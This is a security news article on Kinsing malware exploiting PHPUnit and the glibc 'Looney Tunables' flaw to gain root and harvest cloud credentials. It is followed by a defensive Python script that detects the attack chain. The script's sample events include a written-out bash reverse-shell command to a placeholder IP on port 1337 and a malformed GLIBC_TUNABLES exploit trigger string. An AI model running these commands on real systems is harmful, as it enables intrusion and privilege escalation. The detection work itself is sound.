Kinsing malware operators target cloud environments with systems vulnerable to “Looney Tunables,” a Linux security issue identified as CVE-2023-4911 that allows a local attacker to gain root privileges on the system.
Looney Tunables is a buffer overflow in the glibc dynamic loader (ld.so), triggered through the GLIBC_TUNABLES environment variable. The bug was introduced in glibc 2.34 in April 2021 and publicly disclosed in early October 2023. Within days of the disclosure, proof-of-concept (PoC) exploits were publicly available.
In a report from cloud security firm Aqua Nautilus, researchers describe a Kinsing malware attack in which the malicious actor exploited CVE-2023-4911 to elevate permissions on a compromised machine.
Kinsing is known for breaching cloud-based systems and applications (e.g. Kubernetes, Docker APIs, Redis and Jenkins) to deploy cryptomining software. Recently, Microsoft observed them targeting Kubernetes clusters via misconfigured PostgreSQL containers.
Aqua Nautilus researchers say the attack begins by exploiting a known vulnerability in the PHP testing framework PHPUnit to gain code execution on the target, followed by triggering the Looney Tunables flaw to elevate privileges.
“Using a rudimentary but typical PHPUnit vulnerability exploitation attack, a component of Kinsing’s ongoing campaign, we discovered the threat actor’s manual efforts to manipulate the Looney Tunables vulnerability,” the Aqua Nautilus report reads.
Departing from their usual practice, the Kinsing operators tested this attack manually, presumably to confirm it worked as intended before writing scripts to automate it.
Exploitation of the PHPUnit flaw (CVE-2017-9841) opens a reverse shell on port 1337 of the compromised system, which the Kinsing operators use to run reconnaissance commands such as “uname -a” and “password”.
Additionally, attackers drop a script named “gnu-acme.py” on the system, which exploits CVE-2023-4911 for privilege escalation.
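The four stages described above (PHPUnit exploitation, a reverse shell to port 1337, the gnu-acme.py dropper, and the GLIBC_TUNABLES trigger) each leave a distinct trace in host and web telemetry. The following detection logic is an added example, not code from the Aqua Nautilus report or from BleepingComputer: it runs simple rules over constructed sample events and reports which stages were seen and whether the whole chain appeared in order. The flat key=value event format, the IP addresses and the rule names are assumptions made for illustration. The request path /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php is the endpoint through which CVE-2017-9841 is exploited, and the GLIBC_TUNABLES rule looks for the "name=name=value" form used by the public CVE-2023-4911 PoCs, which a legitimate colon-separated tunables string never contains.

```python
import re
from typing import Callable, Dict, List

# Constructed sample telemetry for this example (not data from the Aqua Nautilus
# report): one web-server access record, then process-execution and network events,
# all in an assumed flat key=value form so the block runs offline.
SAMPLE_EVENTS = [
    'type=http src=203.0.113.5 method=POST uri=/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php status=200',
    'type=exec pid=4123 ppid=3999 comm=sh cmdline="sh -c bash -i >& /dev/tcp/198.51.100.7/1337 0>&1"',
    'type=net pid=4123 dst=198.51.100.7 dport=1337 proto=tcp',
    'type=exec pid=4130 ppid=4123 comm=python3 cmdline="python3 /tmp/gnu-acme.py"',
    'type=exec pid=4140 ppid=4130 comm=su cmdline="/usr/bin/su --help" env="GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=AAAA"',
    # Benign: a single well-formed tunable, which must not fire the rule.
    'type=exec pid=4150 ppid=1 comm=ls cmdline="ls -la" env="GLIBC_TUNABLES=glibc.malloc.mxfast=1"',
]

# key=value or key="quoted value" tokens.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Turn 'k=v k2="quoted v"' into a dict, stripping surrounding quotes."""
    fields = {}
    for key, value in KV_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields


def tunables_look_malformed(value: str) -> bool:
    """Legitimate GLIBC_TUNABLES values are 'name=value' entries joined by ':'.
    The public CVE-2023-4911 PoCs pass one entry of the form 'name=name=value',
    so any entry containing more than one '=' is flagged."""
    return any(entry.count("=") > 1 for entry in value.split(":"))


def tunables_env_value(event: Dict[str, str]) -> str:
    """Return the GLIBC_TUNABLES value carried in the event's env field, or ''."""
    env = event.get("env", "")
    if env.startswith("GLIBC_TUNABLES="):
        return env.split("=", 1)[1]
    return ""


# One rule per stage of the chain; each takes a parsed event and returns a bool.
RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "phpunit_eval_stdin": lambda e: e.get("type") == "http"
    and "eval-stdin.php" in e.get("uri", ""),
    "reverse_shell_1337": lambda e: (e.get("type") == "net" and e.get("dport") == "1337")
    or "/dev/tcp/" in e.get("cmdline", ""),
    "gnu_acme_dropper": lambda e: e.get("type") == "exec"
    and "gnu-acme.py" in e.get("cmdline", ""),
    "looney_tunables_env": lambda e: e.get("type") == "exec"
    and tunables_look_malformed(tunables_env_value(e)),
}

CHAIN_ORDER = ["phpunit_eval_stdin", "reverse_shell_1337", "gnu_acme_dropper", "looney_tunables_env"]


def analyze(lines: List[str]) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the event lines it fires on."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for idx, line in enumerate(lines):
        event = parse_event(line)
        for name, rule in RULES.items():
            if rule(event):
                hits[name].append(idx)
    return hits


def chain_observed(hits: Dict[str, List[int]]) -> bool:
    """True when every stage fired and their first occurrences appear in chain order."""
    firsts = [min(hits[name]) for name in CHAIN_ORDER if hits[name]]
    return len(firsts) == len(CHAIN_ORDER) and firsts == sorted(firsts)


if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for rule_name, indices in results.items():
        print(f"{rule_name}: events {indices}")
    print("full chain observed:", chain_observed(results))
```

The GLIBC_TUNABLES rule is the one worth keeping after this campaign: the variable is rarely set in production, and a value whose entry carries a second "=" has no legitimate reading. On a real host the env field would come from an EDR or auditd process record, and the rule should be paired with a check that the target binary is setuid, since that is what the exploit needs.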
The Looney Tunables exploit is fetched directly from the repository of the researcher who published the PoC, likely to avoid hosting it on attacker-controlled infrastructure. BleepingComputer informed the researcher of the abuse, who said they would disrupt the operation by replacing the directly linked file.
The backdoor the attackers deploy gives them the ability to execute commands, perform file management actions, collect network and server information, and perform encryption and decryption functions.
Ultimately, Kinsing showed interest in cloud service provider (CSP) credentials, particularly AWS instance identity data, which Aqua Nautilus describes as a significant shift toward more sophisticated and damaging activity by this threat actor.
The researchers believe this campaign was an experiment, since the threat actor relied on a different tactic than usual and expanded the scope of the attack to harvesting cloud service provider credentials.